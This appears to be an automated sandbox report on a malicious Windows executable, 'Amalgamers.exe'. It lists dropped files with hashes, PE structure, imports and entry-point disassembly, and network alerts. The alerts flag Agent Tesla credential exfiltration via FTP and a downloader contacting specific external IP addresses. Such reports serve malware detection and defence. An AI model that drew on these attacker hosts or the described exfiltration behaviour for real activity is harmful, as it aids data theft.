Malicious: | true |
Reputation: | low |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 942432 |
Entropy (8bit): | 7.854546227436502 |
Encrypted: | false |
SSDEEP: | 24576:IyG1qpfQfJtOutBz+sTrMEnPaS9Jv8MPtquNs:D8qeRg8BzPMEyS3LPfNs |
MD5: | E2A5B947AC8266E79CC0C9FAFF051849 |
SHA1: | A128AAC0DE4BBF879F7DF28526E6B59A30FB82B1 |
SHA-256: | B5276A247BE390E58BBB52535B1437F1AAE13CA70930CE885C8AAD870BA01053 |
SHA-512: | E44B6DC1E3043C5AA4E030180B071C8E6B007672FEACF9A6044A656DE55DB499C9F34C3ED9A1D0553DEDDD6FB1C241226F70348B178326292DFDB281BA6EDDE5 |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | true |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Users\user\Desktop\Amalgamers.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 440690 |
Entropy (8bit): | 1.255581911697702 |
Encrypted: | false |
SSDEEP: | 1536:G1N2MtdS2LvejlGHy8HheDep9Au5JxtyhfTby:cN2wddLWgHrBv9FDtGfTby |
MD5: | AE5B0E26F9F3A5A2DA1071D81623F492 |
SHA1: | E6DF996B040001B45BC5DF188A812FFCA228402F |
SHA-256: | 40905A865B10C2C4A8628EB591026C72569F84DF34595095CEE5687037BCE8C1 |
SHA-512: | FBF0607DDA3B81358E1E629625AFF263F0246128C5B3EC0665FF3D09AD82C64D4A9CF699E17338710BBAD7F530BF9BB6C025BA1B10B43EAC6BE0F24F61529859 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Users\user\Desktop\Amalgamers.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 409561 |
Entropy (8bit): | 1.256529395530017 |
Encrypted: | false |
SSDEEP: | 768:RhkK/VMgjc5rBHA53RJq0JhgYHWaQcVEVvbqaS3XDmLVKc3uL3edED7YBjRoAbvd:w6vrrHCXJkW5C4jts0K2y8VzuOvuW |
MD5: | C2731713BAF2EDFFFFF7C53C3C61CD53 |
SHA1: | A6C43F762C7C3167D0B42D5DD6E3B312E16A8308 |
SHA-256: | 36E586A6BF59992B10270BEC66272E881E419BFE28DB677A26209960D34BF17D |
SHA-512: | 2CB775B85A98A3344CA45003E64C65D001FAF8ACBBB8AADDA19B18305F4D9565B6AA7CAEBCCF5496B6CC4315FC7C99574175F50FF5E220A8FACD939C33B3B4AA |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Users\user\Desktop\Amalgamers.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 432 |
Entropy (8bit): | 4.271166045363327 |
Encrypted: | false |
SSDEEP: | 12:mGujq8VseUm/LlyyocSEMXbP0WeWegCQW4YNC1ApmP:juY6d4EKP0/gCQNc8P |
MD5: | 93830656C8BBC22387F3539DB1AA7892 |
SHA1: | CA06079A8DCDD33C056B3134DDA7F493C9D5B956 |
SHA-256: | BFCAF44A84BE23126AF3FB6A20E4803F7821CB3EC1C29A2DB815311640928095 |
SHA-512: | 8AE2D33B2908CA53FC7CCF2FEC0F9A196E5E929B3186A82461D1CAA25314E192075FFDBA869D2B61EC8D747DCB22A8E9B485CB6EFE95C9FBB9C3D145CFBFD263 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Amalgamers.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 336987 |
Entropy (8bit): | 7.666340371530923 |
Encrypted: | false |
SSDEEP: | 6144:E6JlraYSCu5Xoyx6DkG2gXz1Q+nNH7BYyEh7Zr5WHS2dOgS:EKcYSLFoyxEkGR9N9Gh7F5WH7M |
MD5: | D3A1AD4DCC66A97ED5434CB9AFE43C19 |
SHA1: | 56C027799460524E096C2A14F9B791480C0E052E |
SHA-256: | E268FEF1533354A336F10CD2C54B34DD37FA1C7BBEB1BC67BA2EE748F3540775 |
SHA-512: | 1E82862724689E47EF56DF069324BD797A660C67590EDE1057F8603876CA52E8AF1C4F215390E2B108BFDA39833C6E79DD5D80D2EFF9F7BAB8B7B9F1444147C6 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Amalgamers.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 241978 |
Entropy (8bit): | 1.246588775581002 |
Encrypted: | false |
SSDEEP: | 768:CvIX3g9acDkuE8zXgrmOhShQF8gFuZadsvV97nSx89Ra2VAPKRdimo31v9BzEXmQ:Wuwa6FdB7kyA |
MD5: | FA6863BE9E976E93018B15628070BF7C |
SHA1: | 7B288424CEC51F8E2EF38519AE59E6B1D901416C |
SHA-256: | BCF7E7663451AE349B3B8458845CF99E3ED8354D800DD39D5F4BA7A4205BF7A1 |
SHA-512: | CDE30C6176879BE839EC30F06068D756E9536308B6336888EB6A26B06E8D56D8674796C19B559F84A4F0389A39922BAF335D1AD9A388B29315DD84338BD90D03 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Amalgamers.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 472128 |
Entropy (8bit): | 1.2500192207194354 |
Encrypted: | false |
SSDEEP: | 1536:dpye9Lw5Dl0MYAnajCo6o097EAgUC7lLjs0k:dIxDl0NAn5E0K35G |
MD5: | 7098E71A650191D33BB82D0B4E2DEC25 |
SHA1: | EDDA248F8FDC86D8420FC4BE21EA79DCC27D2CF8 |
SHA-256: | E77F9F89C0D096EF18C9FA5C644B93F028F860DB95E4719E2A891E36BDF72D13 |
SHA-512: | A16CF0CB8AC38E554B7BE7EC04BC067AECD5864183EB960004FFCEAE603A21C0B817EE5D39F43115E8970B23922ECC5F696B4AB9546FA182762132E1EC3D8D0F |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Amalgamers.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 449259 |
Entropy (8bit): | 1.2591643282176364 |
Encrypted: | false |
SSDEEP: | 1536:6tLYXkMJYLHxnrm5SOJuf/saTv3cAO3PlJm+nr2/GF4:6t0JYLCXuJv38fi+r2/GF |
MD5: | DB5B6812D41435A4D58A9A005197324D |
SHA1: | 208BDE38448423C9736331740F1715C573585F9D |
SHA-256: | 26362E1BCB43858D0921B95348DE11948141C662B249CE279DC584CCAB565327 |
SHA-512: | 62C0400CA7951AD1E24007D24F6F41CCF7FD2B3EA67CEC220D82CDC52DCBB93FAC8A6CBA7CEF4522190C00DC30DB20F520C9B6666068AC0B09EFFD28D2E7E90A |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Amalgamers.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 220386 |
Entropy (8bit): | 1.2494539894139274 |
Encrypted: | false |
SSDEEP: | 768:dk0GCeW7H+LxETH05l7BKcpoHEmE9MSonQpCovaGbNxgEeKhlmaY4IFUyN1ptbGW:+JYmDEFlN1PFInmRpptl |
MD5: | 0BEFCE0893D830815D7995ED3E2F307B |
SHA1: | 4D27BBE8FCAB8FA8B5C30634C8442C3CE883345F |
SHA-256: | 81F8CD084521DD7D248374A9A4551790C0C7EDD2F5A30C2C1A8FBF67CAAA6372 |
SHA-512: | EA721D2D1E54EE8397C2C6C1A14F973F2573E95D1C2DF1B52C3368C0E7364AA719D1F39FF635AAF206BA0A1860B3B2B6864068BF37931ADC8D16D81D1F93EBD9 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Amalgamers.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 272334 |
Entropy (8bit): | 1.2494878642055454 |
Encrypted: | false |
SSDEEP: | 768:vkFEzMeu6cxURq5nyP2N2oMCCqBHjCaTwS6nNrUlsP8PogoJOhQuKOXM7C6wTurp:ewZ2N2IMrUhhd8GE8Qmet |
MD5: | A182D70079F2B7624FEC8D768657838F |
SHA1: | C6BE4431D6A7C954080B8609C96BBAFDF6FB3FA9 |
SHA-256: | 4C7BEF24AFE77BD9FA815C592BAE7A2C89825B2D4C972D45D4C1154D325AB906 |
SHA-512: | 258A37897E2BC939766FC109974C13B0AE814B3C5935913B728FC9E44AEA25722C2E5496CA7B2EAAEA68459450B8EA91B97924D92B7398FD6295839C3DF3D46F |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.854546227436502 |
TrID: |
|
File name: | Amalgamers.exe |
File size: | 942'432 bytes |
MD5: | e2a5b947ac8266e79cc0c9faff051849 |
SHA1: | a128aac0de4bbf879f7df28526e6b59a30fb82b1 |
SHA256: | b5276a247be390e58bbb52535b1437f1aae13ca70930ce885c8aad870ba01053 |
SHA512: | e44b6dc1e3043c5aa4e030180b071c8e6b007672feacf9a6044a656de55db499c9f34c3ed9a1d0553deddd6fb1c241226f70348b178326292dfdb281ba6edde5 |
SSDEEP: | 24576:IyG1qpfQfJtOutBz+sTrMEnPaS9Jv8MPtquNs:D8qeRg8BzPMEyS3LPfNs |
TLSH: | 951523E2FE54D5F5C5B652B08B77AA98CE12ADA6654129332603338F397B101C71F38B |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...)..\.................d...|..... |
Icon Hash: | 4d2e36276b2c2f1e |
Entrypoint: | 0x40320c |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x5C157F29 [Sat Dec 15 22:24:41 2018 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | 3abe302b6d9a1256e6a915429af4ffd2 |
Signature Valid: | false |
Signature Issuer: | CN=Allotypies, O=Allotypies, L=Pengorffwysfa, C=GB |
Signature Validation Error: | A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider |
Error Number: | -2146762487 |
Not Before, Not After |
|
Subject Chain |
|
Version: | 3 |
Thumbprint MD5: | 9DC9AC0C4F10BA13B19BE7DA0B467514 |
Thumbprint SHA-1: | E32C0D98B51DE07D43668B668DFD6299419466CE |
Thumbprint SHA-256: | CC4F1C667AF26C71080FA4E10FA6DA45F61C0937598A075F7DD8E11287032457 |
Serial: | 715987EBF17283939D8427A933D97793F1B45E95 |
Instruction |
---|
sub esp, 00000184h |
push ebx |
push esi |
push edi |
xor ebx, ebx |
push 00008001h |
mov dword ptr [esp+18h], ebx |
mov dword ptr [esp+10h], 0040A198h |
mov dword ptr [esp+20h], ebx |
mov byte ptr [esp+14h], 00000020h |
call dword ptr [004080A0h] |
call dword ptr [0040809Ch] |
and eax, BFFFFFFFh |
cmp ax, 00000006h |
mov dword ptr [0042F40Ch], eax |
je 00007FEA2C4FB453h |
push ebx |
call 00007FEA2C4FE52Ah |
cmp eax, ebx |
je 00007FEA2C4FB449h |
push 00000C00h |
call eax |
mov esi, 00408298h |
push esi |
call 00007FEA2C4FE4A6h |
push esi |
call dword ptr [00408098h] |
lea esi, dword ptr [esi+eax+01h] |
cmp byte ptr [esi], bl |
jne 00007FEA2C4FB42Dh |
push 0000000Ah |
call 00007FEA2C4FE4FEh |
push 00000008h |
call 00007FEA2C4FE4F7h |
push 00000006h |
mov dword ptr [0042F404h], eax |
call 00007FEA2C4FE4EBh |
cmp eax, ebx |
je 00007FEA2C4FB451h |
push 0000001Eh |
call eax |
test eax, eax |
je 00007FEA2C4FB449h |
or byte ptr [0042F40Fh], 00000040h |
push ebp |
call dword ptr [00408044h] |
push ebx |
call dword ptr [00408288h] |
mov dword ptr [0042F4D8h], eax |
push ebx |
lea eax, dword ptr [esp+38h] |
push 00000160h |
push eax |
push ebx |
push 00429830h |
call dword ptr [00408178h] |
push 0040A188h |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x853c | 0xa0 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x40000 | 0x11488 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xe5850 | 0x910 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x298 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x628f | 0x6400 | 6cd58568c5809fdd0c7dcb006e4acdba | False | 0.6700390625 | data | 6.442207080714446 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x8000 | 0x135c | 0x1400 | b27ba0846d4bbf5bff764f5a5c418a97 | False | 0.4611328125 | data | 5.240043476337556 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xa000 | 0x25518 | 0x600 | 12c02de2bdc517e2722ceeb84aff8b34 | False | 0.455078125 | data | 4.04938010159809 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x30000 | 0x10000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x40000 | 0x11488 | 0x11600 | b9be6c5b4569a43951d869c84801fc0a | False | 0.29055193345323743 | data | 3.8823683070253874 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0x40238 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.2831539098544895 |
RT_DIALOG | 0x50a60 | 0x144 | data | English | United States | 0.5216049382716049 |
RT_DIALOG | 0x50ba8 | 0x120 | data | English | United States | 0.5104166666666666 |
RT_DIALOG | 0x50cc8 | 0x11c | data | English | United States | 0.6056338028169014 |
RT_DIALOG | 0x50de8 | 0xc4 | data | English | United States | 0.5918367346938775 |
RT_DIALOG | 0x50eb0 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0x50f10 | 0x14 | data | English | United States | 1.15 |
RT_VERSION | 0x50f28 | 0x220 | data | English | United States | 0.5202205882352942 |
RT_MANIFEST | 0x51148 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795 |
DLL | Import |
---|---|
KERNEL32.dll | GetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA |
USER32.dll | ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA |
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA |
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA |
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-09T20:46:13.669638+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.4 | 49730 | TCP |
2024-11-09T20:46:52.578190+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.4 | 49736 | TCP |
2024-11-09T20:47:08.054416+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49797 | 185.36.171.17 | 80 | TCP |
2024-11-09T20:47:13.762981+0100 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.4 | 49819 | 86.107.36.93 | 21 | TCP |
2024-11-09T20:47:14.515003+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49835 | 86.107.36.93 | 35643 | TCP |
2024-11-09T20:47:14.520299+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49835 | 86.107.36.93 | 35643 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 9, 2024 20:47:07.011639118 CET | 49797 | 80 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:07.016812086 CET | 80 | 49797 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:07.016891003 CET | 49797 | 80 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:07.016972065 CET | 49797 | 80 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:07.021724939 CET | 80 | 49797 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:08.054354906 CET | 80 | 49797 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:08.054415941 CET | 49797 | 80 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:08.058527946 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:08.058557987 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:08.058617115 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:08.071583033 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:08.071602106 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:09.402777910 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:09.402870893 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:09.493004084 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:09.493022919 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:09.493247986 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:09.493374109 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:09.546700001 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:09.587331057 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:09.799273968 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:09.799341917 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:09.799350023 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:09.799391985 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:09.930088997 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:09.930105925 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:09.930149078 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:09.930174112 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:09.930186033 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:09.930213928 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:09.930233955 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:09.931895018 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:09.931912899 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:09.931968927 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:09.931977034 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:09.932018042 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.060064077 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.060084105 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.060198069 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.060210943 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.060256958 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.060972929 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.060985088 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.061043978 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.061049938 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.061100960 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.062762976 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.062779903 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.062843084 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.062849045 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.062886953 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.176728964 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.176745892 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.176820993 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.176830053 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
